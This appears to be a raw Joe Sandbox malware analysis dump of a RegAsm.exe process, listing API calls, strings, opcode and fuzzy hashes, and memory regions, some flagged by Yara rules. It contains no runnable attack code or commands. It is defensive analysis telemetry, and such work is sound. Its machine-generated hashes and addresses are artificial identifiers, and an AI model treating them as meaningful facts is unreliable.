                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                  • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                                  • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a0582fcb00f2b8c3fdd36a84b89cd3d3599bd63c3528f57dcdf29f2455687ae
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14990ecd06d284bee3861f1b2f99af26a203b6d03ed431371909539543806595
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a0582fcb00f2b8c3fdd36a84b89cd3d3599bd63c3528f57dcdf29f2455687ae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36415771A0460C9BCB18CF79DA4516EBBE5EFC5348F20CA3EE855A7B41EB309844C791
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C844721
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C833EBD,00000017,?,00000000,?,6C833EBD,?,?,6C7F42D2), ref: 6C7F4444
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                                                                                                  • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                                                                  • API String ID: 680628322-2661126502
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0290ddda0e34f91503980a24c64cd1c80b2a99d232de9fb4f032ebb681ebf30e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94cbecf60dd385c400b033d2e60654103dbde47b05282239251f2e68d3d8a5f2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0290ddda0e34f91503980a24c64cd1c80b2a99d232de9fb4f032ebb681ebf30e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A317771F0420C9BCB18CF6CD9852AEBBE6DBC9314F54893EE8059BB41EB74D8048B90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C833EBD,6C833EBD,00000000), ref: 6C7F42A9
                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C84B127), ref: 6C84B463
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C84B4C9
                                                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C84B4E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                                  • String ID: pid:
                                                                                                                                                                                                                                                                                                  • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                                  • Opcode ID: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: c5ed005e413d1abd899575f70d970794e46f89d80575514758e21ce33caf974b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32311031A01A1C8FCB20DFA9DA84AFEB7B5BF45318F544D29D81167A41E731E849CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83E577
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83E584
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83E5DE
                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C83E8A6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                                                                                  • API String ID: 1483687287-53385798
                                                                                                                                                                                                                                                                                                  • Opcode ID: 196e9c28af1f74460c699d68741cf0a0cce657243d2dcca092baa0f751480404
                                                                                                                                                                                                                                                                                                  • Instruction ID: f41c7da5e594ebbf835f58b4f8eb8a395b9d270bece79738972b05a2c8e395a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196e9c28af1f74460c699d68741cf0a0cce657243d2dcca092baa0f751480404
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5011CE32A04268DFCB319F19C54CA6EBBB4FB8932CF400A29E84547B50E770A804CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411919
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileSize
                                                                                                                                                                                                                                                                                                  • String ID: @gA
                                                                                                                                                                                                                                                                                                  • API String ID: 2872161284-2763839668
                                                                                                                                                                                                                                                                                                  • Opcode ID: be0861bd07478ad02713f18f795e35d96040d96b66875ad2d50d8ded7a170f8d
                                                                                                                                                                                                                                                                                                  • Instruction ID: baf132ae4d0610b981fda35545c6c569f4d03e1b4a05ac6343dd9b92e07ff3f1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0861bd07478ad02713f18f795e35d96040d96b66875ad2d50d8ded7a170f8d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0E931E50214BBE720DB68EC09FDA776DDB09721F0002A5FD15E32D0E7706A4086D4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0040F4FF
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040F514
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                                                                  • String ID: LpB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 3728558374-1565407916
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca0a715389841535aa54f65f476655908351ce493131d4d21d17ec373f46aef7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 36e5075b6a10c60e39c5ab8d7a4802c09e0a4f3ec3a0c1e1d2f3810fb1fc35a5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca0a715389841535aa54f65f476655908351ce493131d4d21d17ec373f46aef7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E06C7190020876DB24EFB5E8615DF77589F50358F00827FFD1551581EB38E65C86A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840CD5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C82F9A7
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840D40
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DCB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DDD
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DF2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4069420150-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDA4
  • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
  • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D158
  • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000098,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D177
• ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDC4
  • Part of subcall function 6C847480: ReleaseSRWLockExclusive.KERNEL32(?,6C8515FC,?,?,?,?,6C8515FC,?), ref: 6C8474EB
• moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CECC
  • Part of subcall function 6C80CA10: mozalloc_abort.MOZGLUE(?), ref: 6C80CAA2
  • Part of subcall function 6C83CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C84CEEA,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000), ref: 6C83CB57
  • Part of subcall function 6C83CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C83CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C84CEEA,?,?), ref: 6C83CBAF
• tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D058
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
• String ID:
• API String ID: 861561044-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTickCount64.KERNEL32 ref: 6C815D40
• EnterCriticalSection.KERNEL32(6C87F688), ref: 6C815D67
• __aulldiv.LIBCMT ref: 6C815DB4
• LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C815DED
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
• String ID:
• API String ID: 557828605-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FCEBD
• memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C7FCEF5
• memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C7FCF4E
Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: memcpy$memset
• String ID: 0
• API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                                                  • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113F0: GetProcessHeap.KERNEL32(00000000,?,?,0041061B,00000000,?,?,00000001), ref: 004113FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113F0: HeapFree.KERNEL32(00000000,?,0041061B,00000000,?,?,00000001), ref: 00411404
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 837085947-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C8382BC,?,?), ref: 6C83649B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8364A9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C83653F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83655A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen
                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                  • API String ID: 39653677-216407459
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C80B4F5
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B502
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B542
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C80B578
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C7FF20E,?), ref: 6C833DF5
                                                                                                                                                                                                                                                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C7FF20E,00000000,?), ref: 6C833DFC
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C833E06
                                                                                                                                                                                                                                                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C833E0E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CC00: GetCurrentProcess.KERNEL32(?,?,6C7F31A7), ref: 6C82CC0D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7F31A7), ref: 6C82CC16
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
